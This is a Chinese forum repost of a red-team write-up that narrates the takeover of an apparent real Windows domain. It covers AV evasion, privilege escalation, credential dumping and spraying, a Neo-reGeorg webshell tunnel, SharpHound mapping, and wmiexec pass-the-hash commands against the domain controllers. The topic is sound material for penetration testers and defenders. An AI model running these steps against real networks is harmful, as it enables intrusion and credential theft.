安全矩阵

 找回密码
 立即注册
搜索
查看: 2601|回复: 0

一次完美的内网域渗透,如何找到最有效的攻击路线,进...

[复制链接]

221

主题

233

帖子

792

积分

高级会员

Rank: 4

积分
792
发表于 2021-8-9 22:40:23 | 显示全部楼层 |阅读模式
一次完美的内网域渗透,如何找到最有效的攻击路线,进行精准域内打击原创 渗透攻击红队 [url=]渗透攻击红队[/url] 今天
收录于话题
#内网渗透14
#工具使用19
#域内渗透31
#隐藏隧道6
#内网穿透2
渗透攻击红队
一个专注于红队攻击的公众号



大家好,这里是 渗透攻击红队的第 69 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!

在域渗透的时候我们手动梳理域内环境需要花很大功夫,这时候通过 SharpHound 对当前机器的环境进行分析,就能够很快知道离域管最近的攻击线路,快速精准打击!


一次完美的内网域渗透
前言

首先是拿到了一个命令执行的点,发现当前跳板机器是存在域环境的:

tasklist 未发现有 AV,并且当前机器是出网机器:

看了看当前系统是 Windows Server 2016:

由于当前是 Windows Server 2016 的服务器,肯定是有微软自带 Windows Defender 的,所以简单做了一下免杀上线到 Cobaltstrike:

然后 ms16-075 提权到 SYSTEM:




内网信息搜集

首先是查看了一下域管分别是哪些用户:

然后查看了一下域控列表,随后 ping 域控机器名得到域控的 IP:

发现域控是 10 段,而当前跳板机器是 192.168.54.200 ,猜测可能不止一个段的机器存活!
先抓一波 hash 把:(Windows server 2016 是抓不了明文密码的)

好家伙,这台机器应该是被”大哥“来过了,应该被改了一下注册表,这才让我抓到了明文,还有其他 hash,之后可以用来 PTH。
然后搜集了一下当前机器的其他密码发现 Oracle 的密码:

然后也抓到了其他浏览器的密码:

整理了一下密码,然后通过域外对域内当前 C 段进行横向喷射:



成功了几台,先留着。

Neo-reGeorg + Socks = 进入目标内网漫游

想要扩大战果还是要做个隧道进行目标内网,但是我发现常用的 frp、nps 都用不了,猜测目标做了限制,后来通过 http 隧道成功进了目标内网!
reGeorg 是 reDuh 的升级版。主要把内网服务器的端口通过http或https隧道转发到本机。
项目地址:https://github.com/L-codes/Neo-reGeorg
先设置密码,生成 tunnel 的 webshell,并上传到目标服务器:

           

python neoreg.py generate -k pass

这个时候直接 VPS 运行,把目标内网流量通过 http 转发到 VPS 的 1080 端口:

           

python neoreg.py -k pass -u http://saulgoodman.cn//wls-wsat/tuu.jsp


然后本地 VPS 代理:

说明代理成功了!记住这里是 127.0.0.1 只能本地代理,客户端代理你服务器的 socks 是代理不上的!为了方便我在我再 Windows 上重新代理了一下,方便后续操作!

这个时候就可以进目标内网了,由于当前目标机器时间是凌晨,且确定没有人在用远程桌面,我直接登陆目标远程桌面:

然后对目标桌面上进行信息搜集发现有 SSH 登陆:

成功又拿下内网其他机器:


然后换个用户登陆到 200 这台机器:(发现有大哥扫描过了,资产还挺多)


发现应该都是 docker,没啥价值!资产收集的差不多了该搜集域内的了!

SharpHound 对域内进行信息搜集

通过 SharpHound 对域内进行信息搜集:

           

execute-assembly /root/桌面/nw/SharpHound.exe -c all


然后把他下载到本地进行分析:

可以看到当前只有四个域管理员:

由于当前跳板机器是DRAxx,我们就分析  DRAxx 的环境:

可以看到当前机器 DRAxx 可以到达 ERIDANUS.xxxx.xxx 机器,思路就是我们可以通过 ERIDANUS 拿到这台机器的权限,然后在拿到最近的域管!那么我们直接通过之前抓到的 ali.hamzeh 密码去横向 wmi 到 ERIDANUS:

           

proxychains python3 wmiexec.py -shell-type cmd xxxx/ali.hamzeh:passsword@192.168.54.53 -codec gbk


然后直接 Powershell 上线到 CobaltStrike:(太卡了这个 socks,又重开了一个 wmi)


由于当前 ERIDANUS 机器没有 AV 直接提权把:

通过查看当前 ERIDANUS 机器发现的确如 SharpHound 分析那样有一个 ebrahim 域管的进程:

直接注入域管进程上线到 CobaltStrike 吧:

成功拿到域管权限!我为了好区分,绿色 beacon 是 域管!之后直接先抓下域管密码 hash:

有了域管的 hash 后,直接可以 PTH 域控:


           

proxychains python3 wmiexec.py -shell-type powershell -hashes :84d562d8c6f5xxxxxxxxxx xxxxx/ebrahim@192.168.10.10 -codec gbk

然后还是老样子,直接 PowerShell 上线到 CobaltStrike:(还是老问题,socks 卡,重开了一个窗口)



成功拿到域控 AD :192.168.10.10

然后通过 PTH 也成功拿到域控 INF-AD-2:192.168.10.200

最后 hashdump 拿下整个域用户 hash:


嗯,就到这吧。

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 13:34 , Processed in 0.014626 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表